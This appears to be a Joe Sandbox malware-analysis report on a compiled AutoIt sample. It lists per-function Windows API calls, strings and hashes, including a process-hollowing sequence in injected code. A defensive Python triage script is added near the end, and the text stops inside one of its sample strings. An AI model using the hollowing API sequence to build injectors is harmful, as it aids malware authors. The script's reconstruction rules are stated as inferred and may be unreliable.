                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                          • String ID: Include$\
                                                                          • API String ID: 3173733714-3429789819
                                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                          • _free.LIBCMT ref: 00452A17
                                                                          • _free.LIBCMT ref: 00452A20
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1255752989-0
                                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                          • String ID: FILE
                                                                          • API String ID: 3888824918-3121273764
                                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • ImageList_ReplaceIcon.COMCTL32(00A8EFD8,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A8EFD8,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc
                                                                          • String ID: Default
                                                                          • API String ID: 1579825452-753088835
                                                                          • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                          • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                          • String ID: AU3!$EA06
                                                                          • API String ID: 1268643489-2658333250

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                          • String ID: ,*H$4*H$@fI
                                                                          • API String ID: 615853336-1459471987

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04198F31
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04199157
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$CloseOpen
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                          • API String ID: 1586453840-614718249

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399

                                                                          Control-flow Graph (rendered graph not reproduced)
                                                                          APIs
                                                                            • Part of subcall function 04198B00: Sleep.KERNELBASE(000001F4), ref: 04198B11
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04198D4B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: JH2FR4Z1AHPWT7PE2N
                                                                          • API String ID: 2694422964-918654617
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Close$OpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 1607946009-824357125
                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 3170942423-0
                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 041982BB
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04198373
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1796927898.0000000004196000.00000040.00000020.00020000.00000000.sdmp, Offset: 04196000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4196000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                          • Instruction ID: 24c8deb82c49129d43f35003b7bd1a2a45a529bf8b8803ba3448d9ce81af8a9e
                                                                          • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                          • Instruction Fuzzy Hash: 11621E70A14258DBEB24DFA4C880BDEB372EF58300F1095A9D10DEB394E7759E81CB59
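The entry above (CreateProcessW, Wow64GetThreadContext and ReadProcessMemory in one function at an unbacked heap region, 0x04196000, rather than in the main image) is the one a triager wants to find first when a report carries the signatures "Modifies the context of a thread in another process" and "Writes to foreign memory regions". The Python below is an added example, not part of the Joe Sandbox report or of its tooling: it parses the "APIs" lines of a function entry in this report's own format, reconstructs the "API ID" shown under "Similarity" so the value can be used to look for the same function in other reports, and flags API combinations typical of process hollowing. The API ID construction is inferred from the values visible in this report (CamelCase names split into words, a small set of prefix/suffix words such as Get, Ex, W, Reg, SH, Rtl, Key and ID dropped, words grouped by how often they occur, groups joined with "$" and sorted alphabetically inside each group); the stop-word list and the triage rules are this example's assumptions, not a published Joe Sandbox specification. The three sample "APIs" sections are copied from function entries in this report.

```python
import re
from collections import Counter

# Assumed stop-word list: prefixes/suffixes that the report's visible "API ID" values omit
# (e.g. "RegOpenKeyExW" contributes only "Open"). Inferred from this report, not documented.
STOP_WORDS = {"Get", "Ex", "W", "A", "Reg", "SH", "Rtl", "Key", "ID", "Nt", "Zw"}

# This example's own triage rules (not Joe Sandbox signatures): API sets whose co-occurrence
# inside a single function is characteristic of process hollowing / thread-context injection.
SUSPICIOUS_COMBOS = {
    "process-hollowing shape: spawn a process, then read its thread context and memory":
        {"CreateProcessW", "Wow64GetThreadContext", "ReadProcessMemory"},
    "hollowing tail: overwrite remote memory, redirect the thread, resume it":
        {"WriteProcessMemory", "SetThreadContext", "ResumeThread"},
}

# One "APIs" line of a function entry, with or without the "Part of subcall function" prefix:
#   • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w:@]*)\.(?P<module>\w+).*?ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# CamelCase splitter that keeps all-caps runs such as "SH" and "ID" as one word.
WORD = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z0-9]*")


def parse_api_calls(block):
    """Return [(api, module, ref)] for every API line of one function entry, subcalls included."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append((m["api"], m["module"], m["ref"]))
    return calls


def words(api):
    """Split a Win32 name into words; CRT/C++ symbols (leading '_' or '::') stay whole."""
    if api.startswith("_") or "::" in api:
        return [api]
    return [w for w in WORD.findall(api) if w not in STOP_WORDS]


def api_id(apis):
    """Reconstruct the report's 'API ID': words grouped by descending occurrence count,
    groups joined with '$', words sorted alphabetically inside each group."""
    counts = Counter(w for api in apis for w in words(api))
    by_count = {}
    for w, n in counts.items():
        by_count.setdefault(n, []).append(w)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def triage(block):
    """Summarise one function entry: its API ID plus any suspicious API combination, with the
    'ref:' code addresses an analyst should open in the disassembly."""
    calls = parse_api_calls(block)
    names = {api for api, _, _ in calls}
    flags = []
    for label, required in SUSPICIOUS_COMBOS.items():
        if required <= names:
            flags.append((label, [ref for api, _, ref in calls if api in required]))
    return {"api_id": api_id([api for api, _, _ in calls]), "flags": flags}


# Sample input: "APIs" sections copied from function entries in this report.
HOLLOWING_BLOCK = r"""
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 041982BB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04198351
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04198373
"""
REGISTRY_BLOCK = r"""
APIs
• RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
• RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
• RegCloseKey.KERNELBASE(?), ref: 0040F2B5
• RegCloseKey.ADVAPI32(?), ref: 0040F2C9
"""
OPENFILE_BLOCK = r"""
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 0042961B
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
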